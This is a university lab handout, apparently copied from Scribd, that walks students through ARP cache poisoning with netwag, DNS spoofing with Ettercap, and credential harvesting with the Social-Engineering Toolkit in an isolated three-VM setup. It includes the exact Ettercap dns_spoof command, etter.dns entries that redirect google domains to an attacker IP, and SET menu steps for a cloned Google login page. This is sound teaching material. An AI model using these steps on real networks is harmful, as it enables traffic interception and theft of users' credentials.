Scribd
Upload
42 views19 pages

Lab 4 ARP and DNS Cache Poisoning v1.4

The ARP cache is an important part of the ARP protocol. Once a mapping between a MAC address and an IP address is resolved as the result of executing the ARP protocol, the mapping will be cached. Therefore, there is no need to repeat the ARP protocol if the mapping is already in the cache. However, because the ARP protocol is stateless, the cache can be easily poisoned by maliciously crafted ARP messages. Such an attack is called the ARP cache poisoning attack. In such an attack, attackers use s

Uploaded by

ahmed
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
42 views19 pages

Lab 4 ARP and DNS Cache Poisoning v1.4

The ARP cache is an important part of the ARP protocol. Once a mapping between a MAC address and an IP address is resolved as the result of executing the ARP protocol, the mapping will be cached. Therefore, there is no need to repeat the ARP protocol if the mapping is already in the cache. However, because the ARP protocol is stateless, the cache can be easily poisoned by maliciously crafted ARP messages. Such an attack is called the ARP cache poisoning attack. In such an attack, attackers use s

Uploaded by

ahmed
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 19

Page |1

ARP And DNS Cache Poisoning

ARP and DNS Cache Poisoning


Goal of this Lab:

In this lab we will be:

1. Using netwag to perform ARP cache poisoning


2. Using SET to take advantage of ARP cache poisoning
3. Using Ettercap to perform DNS cache poisoning
4. Using SET to take advantage of DNS cache poisoning

Pre-requisites for this lab:

1. Kali Linux VM
2. Debian Linux VM as a Client
3. Debian Linux VM as a Server

Document title: ARP and DNS Cache Poisoning


Version: 1.4 Document Created by Vuk Mutapovic & Pravesh Dahal
For any suggestion or issues regarding document please contact [email protected] or [email protected]
Page |2

ARP And DNS Cache Poisoning

Table of Contents
ARP and DNS Cache Poisoning..................................................................................................................1
Understanding TCP/IP based Attacks........................................................................................................4
Lab Environment Setup.........................................................................................................................................................................4

Task 1: ARP cache poisoning.....................................................................................................................5


Step 1: Clear existing ARP table of client VM using following command.............................................................................................5
Step 2: Verify ARP table using following command..............................................................................................................................5
Step 3: Verify connectivity between client and server using ping.........................................................................................................5
Step 4: After verifying the connectivity, check the ARP table of client.................................................................................................6
Step 5: Run apache2 on Server using following command...................................................................................................................6
Student Task 1:......................................................................................................................................................................................6
Step 6: Go to the client machine and Open a browser and type the IP of server.................................................................................7
Step 7: To perform ARP cache poisoning we will use netwag in Attacker VM......................................................................................7
Step 8: Specify the IP of the server and Run it......................................................................................................................................8
Step 9: Verify the ARP cache of Client machine....................................................................................................................................8
Step 10: Try to access apache2 webpage using the IP of the server.....................................................................................................9
Student Task 2:......................................................................................................................................................................................9
Step 11: Run the following command to enable 2nd IP on eth0 on Attacker machine........................................................................9
Student Task 3:......................................................................................................................................................................................9

Task 2: Using SET to take advantage of ARP cache poisoning..................................................................10


Step 1: Use the following options once you run SET...........................................................................................................................10
Student Task 4:....................................................................................................................................................................................10
Step 2: After successfully running SET, go to the Client’s browser and type Server IP........................................................................10
Student Task 5:....................................................................................................................................................................................11
Step 3: Provide Email as Cyber and Password as Security..................................................................................................................11
Student Task 5:....................................................................................................................................................................................12

Task 3: DNS cache poisoning (DNS Spoofing)...........................................................................................12


Student Task 6:....................................................................................................................................................................................13
Ettercap...............................................................................................................................................................................................13

Document title: ARP and DNS Cache Poisoning


Version: 1.4 Document Created by Vuk Mutapovic & Pravesh Dahal
For any suggestion or issues regarding document please contact [email protected] or [email protected]
Page |3

ARP And DNS Cache Poisoning

..................................................................................................................13
Step 1: Use the following command to change the configuration of etter.dns..................................................................................13
Step 2: Navigate to the end of the file and insert the following.........................................................................................................13
Student Task 7:....................................................................................................................................................................................14
Step 3: Clear the cache of Firefox and run Firefox in private window................................................................................................15
Step 4: Run Ettercap dns spoof using following command.................................................................................................................17
Student Task 8:....................................................................................................................................................................................17

Task 4: Using SET to take advantage of DNS cache poisoning..................................................................17


Step 1: Use the browser of Client machine and type the following....................................................................................................17
Student Task 9:....................................................................................................................................................................................18
Student Task 10:..................................................................................................................................................................................19

Document title: ARP and DNS Cache Poisoning


Version: 1.4 Document Created by Vuk Mutapovic & Pravesh Dahal
For any suggestion or issues regarding document please contact [email protected] or [email protected]
Page |4

ARP And DNS Cache Poisoning

Understanding TCP/IP based Attacks

In this lab we will gain first-hand experience on TCP/IP vulnerabilities, as well as attacks against these vulnerabilities.
Vulnerabilities of the TCP/IP protocols occur at several layers. This lab is we will be exploiting ARP which is Layer 2
protocol and DNS which is Layer 7 protocol.

Lab Environment Setup

To conduct this lab, we need 3 VMs connected in NAT Network. The tools being used for this lab are Netwox/Netwag,
Ettercap and SET.

LAB
ENVIRONMENT

SERVER ATTACKER(KALI) CLIENT


(10.0.2.8) 10.0.2.11 (10.0.2.15)

“Netwox is a toolbox for network administrators and network hackers.

Document title: ARP and DNS Cache Poisoning


Version: 1.4 Document Created by Vuk Mutapovic & Pravesh Dahal
For any suggestion or issues regarding document please contact [email protected] or [email protected]
Page |5

ARP And DNS Cache Poisoning

Netwox contains several tools using network library netwib.


Netwox was successfully installed under Linux, Windows, FreeBSD, OpenBSD and Solaris.”

Reference: http://ntwox.sourceforge.net/

Task 1: ARP cache poisoning

The ARP cache is an important part of the ARP protocol. Once a mapping between a MAC address and an IP address
is resolved as the result of executing the ARP protocol, the mapping will be cached. Therefore, there is no need to
repeat the ARP protocol if the mapping is already in the cache. However, because the ARP protocol is stateless, the
cache can be easily poisoned by maliciously crafted ARP messages. Such an attack is called the ARP cache poisoning
attack.

Attackers may use spoofed ARP messages to trick the victim to accept an invalid MAC-to IP mapping, and store the
mapping in its cache. There can be various types of consequences depending on the motives of the attackers. For
example, attackers can launch a DoS attack against a victim by associating a non-existent MAC address to the IP
address of the victim’s default gateway; attackers can also redirect the traffic to and from the victim to another
machine, etc.

Step 1: Clear existing ARP table of client VM using following command

sudo ip -s -s neigh flush all

Step 2: Verify ARP table using following command


1) install net-tools package

sudo apt install net-tools

2) Verify ARP table

sudo arp -a

Step 3: Verify connectivity between client and server using ping

Document title: ARP and DNS Cache Poisoning


Version: 1.4 Document Created by Vuk Mutapovic & Pravesh Dahal
For any suggestion or issues regarding document please contact [email protected] or [email protected]
Page |6

ARP And DNS Cache Poisoning

Step 4: After verifying the connectivity, check the ARP table of client.

sudo arp -a

You can see that MAC address of server has been mapped with IP of server in ARP cache.

Step 5: Run apache2 on Server using following command.

sudo service apache2 start

If you see an error that apache is not found, please install Apache2 server
using following command

sudo apt install apache2

***********************************************************************************************

Student Task 1:
Provide the screenshot of the command:

Document title: ARP and DNS Cache Poisoning


Version: 1.4 Document Created by Vuk Mutapovic & Pravesh Dahal
For any suggestion or issues regarding document please contact [email protected] or [email protected]
Page |7

ARP And DNS Cache Poisoning

***********************************************************************************************

Step 6: Go to the client machine and Open a browser and type the IP of server

Step 7: To perform ARP cache poisoning we will use netwag in Attacker VM.

1) Install netwag using following command:

sudo apt install netwag


2) Start netwag:

sudo netwag

Document title: ARP and DNS Cache Poisoning


Version: 1.4 Document Created by Vuk Mutapovic & Pravesh Dahal
For any suggestion or issues regarding document please contact [email protected] or [email protected]
Page |8

ARP And DNS Cache Poisoning

The GUI frontend of netwox called netwag will open.

Step 8: Specify the IP of the server and Run it.

Step 9: Verify the ARP cache of Client machine

You can see that IP of server has been mapped to MAC address of Attacker machine. We have successfully poisoned
the ARP cache.

Document title: ARP and DNS Cache Poisoning


Version: 1.4 Document Created by Vuk Mutapovic & Pravesh Dahal
For any suggestion or issues regarding document please contact [email protected] or [email protected]
Page |9

ARP And DNS Cache Poisoning

Step 10: Try to access apache2 webpage using the IP of the server.
You need to clear cache and browser history of Firefox first. Look at this link how to do it: LINK

***********************************************************************************************

Student Task 2:
Provide the screenshot of the output and briefly explain the output.

***********************************************************************************************

Step 11: Run the following command to enable 2nd IP on eth0 on Attacker
machine

sudo ip addr add <IP of server>/24 dev eth0

***********************************************************************************************

Student Task 3:
Provide screenshot of the interface eth0 with 2 IPs.

Hint: The command is not ifconfig.

Document title: ARP and DNS Cache Poisoning


Version: 1.4 Document Created by Vuk Mutapovic & Pravesh Dahal
For any suggestion or issues regarding document please contact [email protected] or [email protected]
P a g e | 10

ARP And DNS Cache Poisoning

***********************************************************************************************

Task 2: Using SET to take advantage of ARP cache poisoning


Start SET using following command

sudo setoolkit

Step 1: Use the following options once you run SET

 Social-Engineering Attacks
 Website Attack Vectors
 Credential Harvester Attack Method
 Web Templates
 Use the IP of Attacker
 Use Google as templates

***********************************************************************************************

Student Task 4:

Provide the screenshot of the final output.

***********************************************************************************************

Step 2: After successfully running SET, go to the Client’s browser and type
Server IP

Document title: ARP and DNS Cache Poisoning


Version: 1.4 Document Created by Vuk Mutapovic & Pravesh Dahal
For any suggestion or issues regarding document please contact [email protected] or [email protected]
P a g e | 11

ARP And DNS Cache Poisoning

***********************************************************************************************

Student Task 5:
a) Briefly explain what you have noticed.
b) Provide screenshot.

***********************************************************************************************

Step 3: Provide Email as Cyber and Password as Security


Verify if you see similar output.

Document title: ARP and DNS Cache Poisoning


Version: 1.4 Document Created by Vuk Mutapovic & Pravesh Dahal
For any suggestion or issues regarding document please contact [email protected] or [email protected]
P a g e | 12

ARP And DNS Cache Poisoning

If yes than congratulations, you have successfully redirected the web request which was for server
to the attacker.
***********************************************************************************************

Student Task 5:
Now try with Email as Your name and Password as your learner number and provide screenshot below.

***********************************************************************************************

Task 3: DNS cache poisoning (DNS Spoofing)

Document title: ARP and DNS Cache Poisoning


Version: 1.4 Document Created by Vuk Mutapovic & Pravesh Dahal
For any suggestion or issues regarding document please contact [email protected] or [email protected]
P a g e | 13

ARP And DNS Cache Poisoning

“DNS spoofing, also referred to as DNS cache poisoning, is a form of computer security hacking in which corrupt
Domain Name System data is introduced into the DNS resolver's cache, causing the name server to return an
incorrect result record, e.g. an IP address. This results in traffic being diverted to the attacker's computer (or any
other computer).”

Reference: https://en.wikipedia.org/wiki/DNS_spoofing

***********************************************************************************************

Student Task 6:
Briefly explain what DNS is?

***********************************************************************************************

Ettercap

“Ettercap is a free and open source network security tool for man-in-the-middle attacks on LAN. It can be used for
computer network protocol analysis and security auditing. It runs on various Unix-like operating systems including
Linux, Mac OS X, BSD and Solaris, and on Microsoft Windows. It is capable of intercepting traffic on a network
segment, capturing passwords, and conducting active eavesdropping against a number of common protocols. Its
original developers later founded Hacking Team.”

Reference: https://en.wikipedia.org/wiki/Ettercap_(software)

Web: https://www.ettercap-project.org/

Step 1: Use the following command to change the configuration of etter.dns

sudo nano /etc/ettercap/etter.dns

Step 2: Navigate to the end of the file and insert the following

Document title: ARP and DNS Cache Poisoning


Version: 1.4 Document Created by Vuk Mutapovic & Pravesh Dahal
For any suggestion or issues regarding document please contact [email protected] or [email protected]
P a g e | 14

ARP And DNS Cache Poisoning

*.google.co.in A <IP of Attacker>


mail.google.com A <IP of Attacker>
#*.google.com A <IP of Attacker>
google.com A <IP of Attacker>

#www.google.com PTR <IP of Attacker>


www.google.co.in PTR <IP of Attacker>

*.g00gle.com A <IP of Attacker>

Save and Exit the file. By now you might have been master on it �

***********************************************************************************************

Student Task 7:
What will happen if you uncomment 3 rd line?

***********************************************************************************************

Document title: ARP and DNS Cache Poisoning


Version: 1.4 Document Created by Vuk Mutapovic & Pravesh Dahal
For any suggestion or issues regarding document please contact [email protected] or [email protected]
P a g e | 15

ARP And DNS Cache Poisoning

Step 3: Clear the cache of Firefox and run Firefox in private window.

Document title: ARP and DNS Cache Poisoning


Version: 1.4 Document Created by Vuk Mutapovic & Pravesh Dahal
For any suggestion or issues regarding document please contact [email protected] or [email protected]
P a g e | 16

ARP And DNS Cache Poisoning

Select Everything

Document title: ARP and DNS Cache Poisoning


Version: 1.4 Document Created by Vuk Mutapovic & Pravesh Dahal
For any suggestion or issues regarding document please contact [email protected] or [email protected]
P a g e | 17

ARP And DNS Cache Poisoning

Step 4: Run Ettercap dns spoof using following command.

sudo ettercap -i eth0 -T -M arp -P dns_spoof /<IP of Client>///

***********************************************************************************************

Student Task 8:
Provide the screenshot of the command entered.

***********************************************************************************************

Task 4: Using SET to take advantage of DNS cache poisoning

Step 1: Use the browser of Client machine and type the following

www.google.com

Enter the following:

Email: [email protected]

Password: Learner Number

Document title: ARP and DNS Cache Poisoning


Version: 1.4 Document Created by Vuk Mutapovic & Pravesh Dahal
For any suggestion or issues regarding document please contact [email protected] or [email protected]
P a g e | 18

ARP And DNS Cache Poisoning

***********************************************************************************************

Student Task 9:
Provide the screenshot of the terminal running SET with the credentials captured.

***********************************************************************************************

Document title: ARP and DNS Cache Poisoning


Version: 1.4 Document Created by Vuk Mutapovic & Pravesh Dahal
For any suggestion or issues regarding document please contact [email protected] or [email protected]
P a g e | 19

ARP And DNS Cache Poisoning

***********************************************************************************************

Student Task 10:


Use Ettercap to perform ARP cache poisoning and provide the steps and output.

***********************************************************************************************

Hope you enjoyed.


Now do some research on other types of TCP/IP attacks like ICMP redirect.

Document title: ARP and DNS Cache Poisoning


Version: 1.4 Document Created by Vuk Mutapovic & Pravesh Dahal
For any suggestion or issues regarding document please contact [email protected] or [email protected]

You might also like